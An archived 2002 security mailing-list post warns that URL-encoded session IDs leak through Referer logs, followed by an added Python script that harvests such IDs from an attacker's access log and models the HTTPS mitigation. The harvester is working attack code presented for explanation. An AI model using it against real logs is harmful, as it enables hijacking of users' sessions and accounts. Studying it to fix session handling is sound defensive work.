Pantek Library

Re: Hijacking URL Encoded Session IDs using Referer Logs

From: Bob Lee <crazybob(at)crazybob.org>
Date: Mon Nov 25 2002 - 09:32:49 EST


Many (most?) application servers use URL-encoded session IDs when the user has disabled cookies. Many users disable cookies as a security precaution. There should be an advisory on this so that application server vendors stop allowing URL-encoded session IDs by default.

If you can post an interesting link to a site, you can hijack the sessions of users with cookies disabled, and no one would be the wiser.

Does Hotmail or Yahoo use URL session IDs? E-mail someone a link to your site and hijack their e-mail account. In the scope of this attack, they'd have no way to tell that you stole it.

Also a good reason to use HTTPS.

Bob

On Monday, November 25, 2002, at 07:48 AM, zeno wrote:

> Not to my knowledge. I guess the question would be why would you store
Received on Mon Nov 25 09:59:47 2002
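The leak Bob describes, worked through as an added example (this is not code from the original thread or from any application server vendor): a user whose session ID is carried in the URL clicks an outbound link, and the browser hands that URL, session ID included, to the link target in the Referer header. The script below parses constructed Apache "combined" log lines on the attacker's side, pulls session IDs out of the Referer values (both the `;jsessionid=` path-parameter form used by servlet containers and the `?PHPSESSID=` query-parameter form), and models the HTTPS mitigation the message mentions. The host names, IP addresses, session values and the list of parameter names are all assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One line per request in Apache "combined" log format: the Referer is the
# second-to-last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names that commonly carry a session ID in a URL. This list is an
# assumption for the example; a real harvester would be tuned to the target.
SESSION_PARAM_NAMES = {"jsessionid", "phpsessid", "sessionid", "session_id", "sid"}

# Constructed sample of the attacker's own access log after users of the
# target sites followed the posted link. Hosts, IPs and IDs are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Nov/2002:09:31:02 -0500] "GET /cool-link HTTP/1.1" 200 512 "http://webmail.example/inbox.jsp;jsessionid=A1B2C3D4E5F6A7B8C9D0E1F2A3B4C5D6" "Mozilla/4.0"
198.51.100.12 - - [25/Nov/2002:09:31:09 -0500] "GET /cool-link HTTP/1.1" 200 512 "http://shop.example/cart.php?PHPSESSID=9f8e7d6c5b4a39281706f5e4d3c2b1a0&item=42" "Mozilla/4.0"
192.0.2.33 - - [25/Nov/2002:09:31:15 -0500] "GET /cool-link HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.34 - - [25/Nov/2002:09:31:20 -0500] "GET /cool-link HTTP/1.1" 200 512 "http://news.example/story?id=7" "Mozilla/4.0"
"""


def extract_session_ids(referer):
    """Return {name: value} for session-ID parameters found in a Referer URL.

    Covers both places application servers put the ID when cookies are off:
    a ';name=value' path parameter (servlet containers) and a query parameter
    (PHP and most others). Returns {} for '-' (no Referer) or a clean URL.
    """
    found = {}
    if not referer or referer == "-":
        return found
    parts = urlsplit(referer)  # keeps ';...' path parameters inside .path
    for name, value in re.findall(r";([^;=/?#]+)=([^;/?#]*)", parts.path):
        if name.lower() in SESSION_PARAM_NAMES:
            found[name.lower()] = value
    for name, values in parse_qs(parts.query).items():
        if name.lower() in SESSION_PARAM_NAMES and values:
            found[name.lower()] = values[0]
    return found


def harvest(log_text):
    """Walk the attacker's log; return (origin host, ids, client ip) per leaked session."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        referer = m.group("referer")
        ids = extract_session_ids(referer)
        if ids:
            hits.append((urlsplit(referer).netloc, ids, m.group("ip")))
    return hits


def referer_would_be_sent(page_url, link_url):
    """Model the HTTPS mitigation the message alludes to.

    RFC 2616 section 15.1.3: a client should not send Referer when following
    a link from an HTTPS page to a non-HTTPS one, so a session ID in the
    page URL never reaches the attacker's log. (Modern Referrer-Policy headers
    can tighten or loosen this; the classic rule is what is modelled here.)
    """
    return not (urlsplit(page_url).scheme == "https"
                and urlsplit(link_url).scheme != "https")


if __name__ == "__main__":
    for host, ids, ip in harvest(SAMPLE_LOG):
        print(f"{host}: {ids} (victim {ip})")
```

Run against the sample, two of the four visits leak a usable session ID; the visitor with no Referer and the one coming from a cookie-based site leak nothing. The HTTPS check only helps when the page carrying the session ID is itself served over HTTPS and the outbound link is plain HTTP; an HTTPS-to-HTTPS link still carries the Referer, so moving the ID out of the URL (cookies, or a server setting that refuses URL rewriting) is the real fix.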

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:44 EDT
